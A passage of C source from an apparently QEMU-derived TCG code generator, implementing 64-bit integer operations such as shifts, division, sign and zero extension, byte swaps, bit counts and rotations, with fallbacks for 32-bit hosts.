TCGV_HIGH(tcg_ctx, arg1), c, 32 - c); tcg_temp_free_i32(tcg_ctx, t0); } tcg_gen_shli_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), c); } } #endif void tcg_gen_shli_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) { tcg_debug_assert(arg2 >= 0 && arg2 < 64); #if TCG_TARGET_REG_BITS == 32 tcg_gen_shifti_i64(tcg_ctx, ret, arg1, arg2, 0, 0); #else if (arg2 == 0) { tcg_gen_mov_i64(tcg_ctx, ret, arg1); } else { TCGv_i64 t0 = tcg_const_i64(tcg_ctx, arg2); tcg_gen_shl_i64(tcg_ctx, ret, arg1, t0); tcg_temp_free_i64(tcg_ctx, t0); } #endif } void tcg_gen_shri_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) { tcg_debug_assert(arg2 >= 0 && arg2 < 64); #if TCG_TARGET_REG_BITS == 32 tcg_gen_shifti_i64(tcg_ctx, ret, arg1, arg2, 1, 0); #else if (arg2 == 0) { tcg_gen_mov_i64(tcg_ctx, ret, arg1); } else { TCGv_i64 t0 = tcg_const_i64(tcg_ctx, arg2); tcg_gen_shr_i64(tcg_ctx, ret, arg1, t0); tcg_temp_free_i64(tcg_ctx, t0); } #endif } void tcg_gen_sari_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) { tcg_debug_assert(arg2 >= 0 && arg2 < 64); #if TCG_TARGET_REG_BITS == 32 tcg_gen_shifti_i64(tcg_ctx, ret, arg1, arg2, 1, 1); #else if (arg2 == 0) { tcg_gen_mov_i64(tcg_ctx, ret, arg1); } else { TCGv_i64 t0 = tcg_const_i64(tcg_ctx, arg2); tcg_gen_sar_i64(tcg_ctx, ret, arg1, t0); tcg_temp_free_i64(tcg_ctx, t0); } #endif } void tcg_gen_brcond_i64(TCGContext *tcg_ctx, TCGCond cond, TCGv_i64 arg1, TCGv_i64 arg2, TCGLabel *l) { if (cond == TCG_COND_ALWAYS) { tcg_gen_br(tcg_ctx, l); } else if (cond != TCG_COND_NEVER) { l->refs++; #if TCG_TARGET_REG_BITS == 32 tcg_gen_op6ii_i32(tcg_ctx, INDEX_op_brcond2_i32, TCGV_LOW(tcg_ctx, arg1), TCGV_HIGH(tcg_ctx, arg1), TCGV_LOW(tcg_ctx, arg2), TCGV_HIGH(tcg_ctx, arg2), cond, label_arg(l)); #else tcg_gen_op4ii_i64(tcg_ctx, INDEX_op_brcond_i64, arg1, arg2, cond, label_arg(l)); #endif } } void tcg_gen_brcondi_i64(TCGContext *tcg_ctx, TCGCond cond, TCGv_i64 arg1, int64_t arg2, TCGLabel *l) { if (cond == TCG_COND_ALWAYS) { tcg_gen_br(tcg_ctx, l); } else if (cond != TCG_COND_NEVER) { TCGv_i64 t0 = tcg_const_i64(tcg_ctx, arg2); tcg_gen_brcond_i64(tcg_ctx, cond, arg1, t0, l); tcg_temp_free_i64(tcg_ctx, t0); } } void tcg_gen_setcond_i64(TCGContext *tcg_ctx, TCGCond cond, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { if (cond == TCG_COND_ALWAYS) { tcg_gen_movi_i64(tcg_ctx, ret, 1); } else if (cond == TCG_COND_NEVER) { tcg_gen_movi_i64(tcg_ctx, ret, 0); } else { #if TCG_TARGET_REG_BITS == 32 tcg_gen_op6i_i32(tcg_ctx, INDEX_op_setcond2_i32, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), TCGV_HIGH(tcg_ctx, arg1), TCGV_LOW(tcg_ctx, arg2), TCGV_HIGH(tcg_ctx, arg2), cond); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), 0); #else tcg_gen_op4i_i64(tcg_ctx, INDEX_op_setcond_i64, ret, arg1, arg2, cond); #endif } } void tcg_gen_setcondi_i64(TCGContext *tcg_ctx, TCGCond cond, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) { TCGv_i64 t0 = tcg_const_i64(tcg_ctx, arg2); tcg_gen_setcond_i64(tcg_ctx, cond, ret, arg1, t0); tcg_temp_free_i64(tcg_ctx, t0); } void tcg_gen_muli_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, int64_t arg2) { if (arg2 == 0) { tcg_gen_movi_i64(tcg_ctx, ret, 0); } else if (is_power_of_2(arg2)) { tcg_gen_shli_i64(tcg_ctx, ret, arg1, ctz64(arg2)); } else { TCGv_i64 t0 = tcg_const_i64(tcg_ctx, arg2); tcg_gen_mul_i64(tcg_ctx, ret, arg1, t0); tcg_temp_free_i64(tcg_ctx, t0); } } void tcg_gen_div_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { #if TCG_TARGET_HAS_div_i64 tcg_gen_op3_i64(tcg_ctx, INDEX_op_div_i64, ret, arg1, arg2); #elif TCG_TARGET_HAS_div2_i64 TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_sari_i64(tcg_ctx, t0, arg1, 63); tcg_gen_op5_i64(tcg_ctx, INDEX_op_div2_i64, ret, t0, arg1, t0, arg2); tcg_temp_free_i64(tcg_ctx, t0); #else gen_helper_div_i64(tcg_ctx, ret, arg1, arg2); #endif } void tcg_gen_rem_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { #if TCG_TARGET_HAS_rem_i64 tcg_gen_op3_i64(tcg_ctx, INDEX_op_rem_i64, ret, arg1, arg2); #elif TCG_TARGET_HAS_div_i64 TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_op3_i64(tcg_ctx, INDEX_op_div_i64, t0, arg1, arg2); tcg_gen_mul_i64(tcg_ctx, t0, t0, arg2); tcg_gen_sub_i64(tcg_ctx, ret, arg1, t0); tcg_temp_free_i64(tcg_ctx, t0); #elif TCG_TARGET_HAS_div2_i64 TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_sari_i64(tcg_ctx, t0, arg1, 63); tcg_gen_op5_i64(tcg_ctx, INDEX_op_div2_i64, t0, ret, arg1, t0, arg2); tcg_temp_free_i64(tcg_ctx, t0); #else gen_helper_rem_i64(tcg_ctx, ret, arg1, arg2); #endif } void tcg_gen_divu_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { #if TCG_TARGET_HAS_div_i64 tcg_gen_op3_i64(tcg_ctx, INDEX_op_divu_i64, ret, arg1, arg2); #elif TCG_TARGET_HAS_div2_i64 TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_movi_i64(tcg_ctx, t0, 0); tcg_gen_op5_i64(tcg_ctx, INDEX_op_divu2_i64, ret, t0, arg1, t0, arg2); tcg_temp_free_i64(tcg_ctx, t0); #else gen_helper_divu_i64(tcg_ctx, ret, arg1, arg2); #endif } void tcg_gen_remu_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { #if TCG_TARGET_HAS_rem_i64 tcg_gen_op3_i64(tcg_ctx, INDEX_op_remu_i64, ret, arg1, arg2); #elif TCG_TARGET_HAS_div_i64 TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_op3_i64(tcg_ctx, INDEX_op_divu_i64, t0, arg1, arg2); tcg_gen_mul_i64(tcg_ctx, t0, t0, arg2); tcg_gen_sub_i64(tcg_ctx, ret, arg1, t0); tcg_temp_free_i64(tcg_ctx, t0); #elif TCG_TARGET_HAS_div2_i64 TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_movi_i64(tcg_ctx, t0, 0); tcg_gen_op5_i64(tcg_ctx, INDEX_op_divu2_i64, t0, ret, arg1, t0, arg2); tcg_temp_free_i64(tcg_ctx, t0); #else gen_helper_remu_i64(tcg_ctx, ret, arg1, arg2); #endif } void tcg_gen_ext8s_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_ext8s_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg)); tcg_gen_sari_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_LOW(tcg_ctx, ret), 31); #elif TCG_TARGET_HAS_ext8s_i64 tcg_gen_op2_i64(tcg_ctx, INDEX_op_ext8s_i64, ret, arg); #else tcg_gen_shli_i64(tcg_ctx, ret, arg, 56); tcg_gen_sari_i64(tcg_ctx, ret, ret, 56); #endif } void tcg_gen_ext16s_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_ext16s_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg)); tcg_gen_sari_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_LOW(tcg_ctx, ret), 31); #elif TCG_TARGET_HAS_ext16s_i64 tcg_gen_op2_i64(tcg_ctx, INDEX_op_ext16s_i64, ret, arg); #else tcg_gen_shli_i64(tcg_ctx, ret, arg, 48); tcg_gen_sari_i64(tcg_ctx, ret, ret, 48); #endif } void tcg_gen_ext32s_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_mov_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg)); tcg_gen_sari_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_LOW(tcg_ctx, ret), 31); #elif TCG_TARGET_HAS_ext32s_i64 tcg_gen_op2_i64(tcg_ctx, INDEX_op_ext32s_i64, ret, arg); #else tcg_gen_shli_i64(tcg_ctx, ret, arg, 32); tcg_gen_sari_i64(tcg_ctx, ret, ret, 32); #endif } void tcg_gen_ext8u_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_ext8u_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg)); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), 0); #elif TCG_TARGET_HAS_ext8u_i64 tcg_gen_op2_i64(tcg_ctx, INDEX_op_ext8u_i64, ret, arg); #else tcg_gen_andi_i64(tcg_ctx, ret, arg, 0xffu); #endif } void tcg_gen_ext16u_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_ext16u_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg)); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), 0); #elif TCG_TARGET_HAS_ext16u_i64 tcg_gen_op2_i64(tcg_ctx, INDEX_op_ext16u_i64, ret, arg); #else tcg_gen_andi_i64(tcg_ctx, ret, arg, 0xffffu); #endif } void tcg_gen_ext32u_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_mov_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg)); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), 0); #elif TCG_TARGET_HAS_ext32u_i64 tcg_gen_op2_i64(tcg_ctx, INDEX_op_ext32u_i64, ret, arg); #else tcg_gen_andi_i64(tcg_ctx, ret, arg, 0xffffffffu); #endif } /* Note: we assume the six high bytes are set to zero */ void tcg_gen_bswap16_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_bswap16_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg)); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), 0); #elif TCG_TARGET_HAS_bswap16_i64 tcg_gen_op2_i64(tcg_ctx, INDEX_op_bswap16_i64, ret, arg); #else TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext8u_i64(tcg_ctx, t0, arg); tcg_gen_shli_i64(tcg_ctx, t0, t0, 8); tcg_gen_shri_i64(tcg_ctx, ret, arg, 8); tcg_gen_or_i64(tcg_ctx, ret, ret, t0); tcg_temp_free_i64(tcg_ctx, t0); #endif } /* Note: we assume the four high bytes are set to zero */ void tcg_gen_bswap32_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_bswap32_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg)); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), 0); #elif TCG_TARGET_HAS_bswap32_i64 tcg_gen_op2_i64(tcg_ctx, INDEX_op_bswap32_i64, ret, arg); #else TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_const_i64(tcg_ctx, 0x00ff00ff); /* arg = ....abcd */ tcg_gen_shri_i64(tcg_ctx, t0, arg, 8); /* t0 = .....abc */ tcg_gen_and_i64(tcg_ctx, t1, arg, t2); /* t1 = .....b.d */ tcg_gen_and_i64(tcg_ctx, t0, t0, t2); /* t0 = .....a.c */ tcg_gen_shli_i64(tcg_ctx, t1, t1, 8); /* t1 = ....b.d. */ tcg_gen_or_i64(tcg_ctx, ret, t0, t1); /* ret = ....badc */ tcg_gen_shli_i64(tcg_ctx, t1, ret, 48); /* t1 = dc...... */ tcg_gen_shri_i64(tcg_ctx, t0, ret, 16); /* t0 = ......ba */ tcg_gen_shri_i64(tcg_ctx, t1, t1, 32); /* t1 = ....dc.. */ tcg_gen_or_i64(tcg_ctx, ret, t0, t1); /* ret = ....dcba */ tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); #endif } void tcg_gen_bswap64_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg) { #if TCG_TARGET_REG_BITS == 32 TCGv_i32 t0, t1; t0 = tcg_temp_new_i32(tcg_ctx); t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_bswap32_i32(tcg_ctx, t0, TCGV_LOW(tcg_ctx, arg)); tcg_gen_bswap32_i32(tcg_ctx, t1, TCGV_HIGH(tcg_ctx, arg)); tcg_gen_mov_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), t1); tcg_gen_mov_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), t0); tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); #elif TCG_TARGET_HAS_bswap64_i64 tcg_gen_op2_i64(tcg_ctx, INDEX_op_bswap64_i64, ret, arg); #else TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); /* arg = abcdefgh */ tcg_gen_movi_i64(tcg_ctx, t2, 0x00ff00ff00ff00ffull); tcg_gen_shri_i64(tcg_ctx, t0, arg, 8); /* t0 = .abcdefg */ tcg_gen_and_i64(tcg_ctx, t1, arg, t2); /* t1 = .b.d.f.h */ tcg_gen_and_i64(tcg_ctx, t0, t0, t2); /* t0 = .a.c.e.g */ tcg_gen_shli_i64(tcg_ctx, t1, t1, 8); /* t1 = b.d.f.h. */ tcg_gen_or_i64(tcg_ctx, ret, t0, t1); /* ret = badcfehg */ tcg_gen_movi_i64(tcg_ctx, t2, 0x0000ffff0000ffffull); tcg_gen_shri_i64(tcg_ctx, t0, ret, 16); /* t0 = ..badcfe */ tcg_gen_and_i64(tcg_ctx, t1, ret, t2); /* t1 = ..dc..hg */ tcg_gen_and_i64(tcg_ctx, t0, t0, t2); /* t0 = ..ba..fe */ tcg_gen_shli_i64(tcg_ctx, t1, t1, 16); /* t1 = dc..hg.. */ tcg_gen_or_i64(tcg_ctx, ret, t0, t1); /* ret = dcbahgfe */ tcg_gen_shri_i64(tcg_ctx, t0, ret, 32); /* t0 = ....dcba */ tcg_gen_shli_i64(tcg_ctx, t1, ret, 32); /* t1 = hgfe.... */ tcg_gen_or_i64(tcg_ctx, ret, t0, t1); /* ret = hgfedcba */ tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); #endif } void tcg_gen_not_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_not_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg)); tcg_gen_not_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg)); #elif TCG_TARGET_HAS_not_i64 tcg_gen_op2_i64(tcg_ctx, INDEX_op_not_i64, ret, arg); #else tcg_gen_xori_i64(tcg_ctx, ret, arg, -1); #endif } void tcg_gen_andc_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_andc_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), TCGV_LOW(tcg_ctx, arg2)); tcg_gen_andc_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1), TCGV_HIGH(tcg_ctx, arg2)); #elif TCG_TARGET_HAS_andc_i64 tcg_gen_op3_i64(tcg_ctx, INDEX_op_andc_i64, ret, arg1, arg2); #else TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_not_i64(tcg_ctx, t0, arg2); tcg_gen_and_i64(tcg_ctx, ret, arg1, t0); tcg_temp_free_i64(tcg_ctx, t0); #endif } void tcg_gen_eqv_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_eqv_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), TCGV_LOW(tcg_ctx, arg2)); tcg_gen_eqv_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1), TCGV_HIGH(tcg_ctx, arg2)); #elif TCG_TARGET_HAS_eqv_i64 tcg_gen_op3_i64(tcg_ctx, INDEX_op_eqv_i64, ret, arg1, arg2); #else tcg_gen_xor_i64(tcg_ctx, ret, arg1, arg2); tcg_gen_not_i64(tcg_ctx, ret, ret); #endif } void tcg_gen_nand_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_nand_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), TCGV_LOW(tcg_ctx, arg2)); tcg_gen_nand_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1), TCGV_HIGH(tcg_ctx, arg2)); #elif TCG_TARGET_HAS_nand_i64 tcg_gen_op3_i64(tcg_ctx, INDEX_op_nand_i64, ret, arg1, arg2); #else tcg_gen_and_i64(tcg_ctx, ret, arg1, arg2); tcg_gen_not_i64(tcg_ctx, ret, ret); #endif } void tcg_gen_nor_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_nor_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), TCGV_LOW(tcg_ctx, arg2)); tcg_gen_nor_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1), TCGV_HIGH(tcg_ctx, arg2)); #elif TCG_TARGET_HAS_nor_i64 tcg_gen_op3_i64(tcg_ctx, INDEX_op_nor_i64, ret, arg1, arg2); #else tcg_gen_or_i64(tcg_ctx, ret, arg1, arg2); tcg_gen_not_i64(tcg_ctx, ret, ret); #endif } void tcg_gen_orc_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { #if TCG_TARGET_REG_BITS == 32 tcg_gen_orc_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), TCGV_LOW(tcg_ctx, arg2)); tcg_gen_orc_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1), TCGV_HIGH(tcg_ctx, arg2)); #elif TCG_TARGET_HAS_orc_i64 tcg_gen_op3_i64(tcg_ctx, INDEX_op_orc_i64, ret, arg1, arg2); #else TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_not_i64(tcg_ctx, t0, arg2); tcg_gen_or_i64(tcg_ctx, ret, arg1, t0); tcg_temp_free_i64(tcg_ctx, t0); #endif } void tcg_gen_clz_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { #if TCG_TARGET_HAS_clz_i64 tcg_gen_op3_i64(tcg_ctx, INDEX_op_clz_i64, ret, arg1, arg2); #else gen_helper_clz_i64(tcg_ctx, ret, arg1, arg2); #endif } void tcg_gen_clzi_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, uint64_t arg2) { #if TCG_TARGET_REG_BITS == 32 && TCG_TARGET_HAS_clz_i32 if (arg2 <= 0xffffffffu) { TCGv_i32 t = tcg_const_i32(tcg_ctx, (uint32_t)arg2 - 32); tcg_gen_clz_i32(tcg_ctx, t, TCGV_LOW(tcg_ctx, arg1), t); tcg_gen_addi_i32(tcg_ctx, t, t, 32); tcg_gen_clz_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1), t); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), 0); tcg_temp_free_i32(tcg_ctx, t); } else #endif { TCGv_i64 t = tcg_const_i64(tcg_ctx, arg2); tcg_gen_clz_i64(tcg_ctx, ret, arg1, t); tcg_temp_free_i64(tcg_ctx, t); } } void tcg_gen_ctz_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { #if TCG_TARGET_HAS_ctz_i64 tcg_gen_op3_i64(tcg_ctx, INDEX_op_ctz_i64, ret, arg1, arg2); #elif TCG_TARGET_HAS_ctpop_i64 || TCG_TARGET_HAS_clz_i64 TCGv_i64 z, t = tcg_temp_new_i64(tcg_ctx); #if TCG_TARGET_HAS_ctpop_i64 tcg_gen_subi_i64(tcg_ctx, t, arg1, 1); tcg_gen_andc_i64(tcg_ctx, t, t, arg1); tcg_gen_ctpop_i64(tcg_ctx, t, t); #else /* Since all non-x86 hosts have clz(0) == 64, don't fight it. */ tcg_gen_neg_i64(tcg_ctx, t, arg1); tcg_gen_and_i64(tcg_ctx, t, t, arg1); tcg_gen_clzi_i64(tcg_ctx, t, t, 64); tcg_gen_xori_i64(tcg_ctx, t, t, 63); #endif z = tcg_const_i64(tcg_ctx, 0); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_EQ, ret, arg1, z, arg2, t); tcg_temp_free_i64(tcg_ctx, t); tcg_temp_free_i64(tcg_ctx, z); #else gen_helper_ctz_i64(tcg_ctx, ret, arg1, arg2); #endif } void tcg_gen_ctzi_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, uint64_t arg2) { #if TCG_TARGET_REG_BITS == 32 && TCG_TARGET_HAS_ctz_i32 if (arg2 <= 0xffffffffu) { TCGv_i32 t32 = tcg_const_i32(tcg_ctx, (uint32_t)arg2 - 32); tcg_gen_ctz_i32(tcg_ctx, t32, TCGV_HIGH(tcg_ctx, arg1), t32); tcg_gen_addi_i32(tcg_ctx, t32, t32, 32); tcg_gen_ctz_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), t32); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), 0); tcg_temp_free_i32(tcg_ctx, t32); } else #endif #if !TCG_TARGET_HAS_ctz_i64 && TCG_TARGET_HAS_ctpop_i64 if (arg2 == 64) { /* This equivalence has the advantage of not requiring a fixup. */ TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_subi_i64(tcg_ctx, t, arg1, 1); tcg_gen_andc_i64(tcg_ctx, t, t, arg1); tcg_gen_ctpop_i64(tcg_ctx, ret, t); tcg_temp_free_i64(tcg_ctx, t); } else #endif { TCGv_i64 t64 = tcg_const_i64(tcg_ctx, arg2); tcg_gen_ctz_i64(tcg_ctx, ret, arg1, t64); tcg_temp_free_i64(tcg_ctx, t64); } } void tcg_gen_clrsb_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg) { #if TCG_TARGET_HAS_clz_i64 || TCG_TARGET_HAS_clz_i32 TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_sari_i64(tcg_ctx, t, arg, 63); tcg_gen_xor_i64(tcg_ctx, t, t, arg); tcg_gen_clzi_i64(tcg_ctx, t, t, 64); tcg_gen_subi_i64(tcg_ctx, ret, t, 1); tcg_temp_free_i64(tcg_ctx, t); #else gen_helper_clrsb_i64(tcg_ctx, ret, arg); #endif } void tcg_gen_ctpop_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1) { #if TCG_TARGET_HAS_ctpop_i64 tcg_gen_op2_i64(tcg_ctx, INDEX_op_ctpop_i64, ret, arg1); #elif TCG_TARGET_REG_BITS == 32 && TCG_TARGET_HAS_ctpop_i32 tcg_gen_ctpop_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, arg1)); tcg_gen_ctpop_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1)); tcg_gen_add_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_LOW(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, ret)); tcg_gen_movi_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, ret), 0); #else gen_helper_ctpop_i64(tcg_ctx, ret, arg1); #endif } void tcg_gen_rotl_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { #if TCG_TARGET_HAS_rot_i64 tcg_gen_op3_i64(tcg_ctx, INDEX_op_rotl_i64, ret, arg1, arg2); #else TCGv_i64 t0, t1; t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_shl_i64(tcg_ctx, t0, arg1, arg2); tcg_gen_subfi_i64(tcg_ctx, t1, 64, arg2); tcg_gen_shr_i64(tcg_ctx, t1, arg1, t1); tcg_gen_or_i64(tcg_ctx, ret, t0, t1); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); #endif } void tcg_gen_rotli_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, unsigned arg2) { tcg_debug_assert(arg2 < 64); /* some cases can be optimized here */ if (arg2 == 0) { tcg_gen_mov_i64(tcg_ctx, ret, arg1); } else { #if TCG_TARGET_HAS_rot_i64 TCGv_i64 t0 = tcg_const_i64(tcg_ctx, arg2); tcg_gen_rotl_i64(tcg_ctx, ret, arg1, t0); tcg_temp_free_i64(tcg_ctx, t0); #else TCGv_i64 t0, t1; t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_shli_i64(tcg_ctx, t0, arg1, arg2); tcg_gen_shri_i64(tcg_ctx, t1, arg1, 64 - arg2); tcg_gen_or_i64(tcg_ctx, ret, t0, t1); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); #endif } } void tcg_gen_rotr_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { #if TCG_TARGET_HAS_rot_i64 tcg_gen_op3_i64(tcg_ctx, INDEX_op_rotr_i64, ret, arg1, arg2); #else TCGv_i64 t0, t1; t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_shr_i64(tcg_ctx, t0, arg1, arg2); tcg_gen_subfi_i64(tcg_ctx, t1, 64, arg2); tcg_gen_shl_i64(tcg_ctx, t1, arg1, t1); tcg_gen_or_i64(tcg_ctx, ret, t0, t1); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); #endif } void tcg_gen_rotri_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, unsigned arg2) { tcg_debug_assert(arg2 < 64); /* some cases can be optimized here */ if (arg2 == 0) { tcg_gen_mov_i64(tcg_ctx, ret, arg1); } else { tcg_gen_rotli_i64(tcg_ctx, ret, arg1, 64 - arg2); } } void tcg_gen_deposit_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2, unsigned int ofs, unsigned int len) { uint64_t mask; TCGv_i64 t1; tcg_debug_assert(ofs < 64); 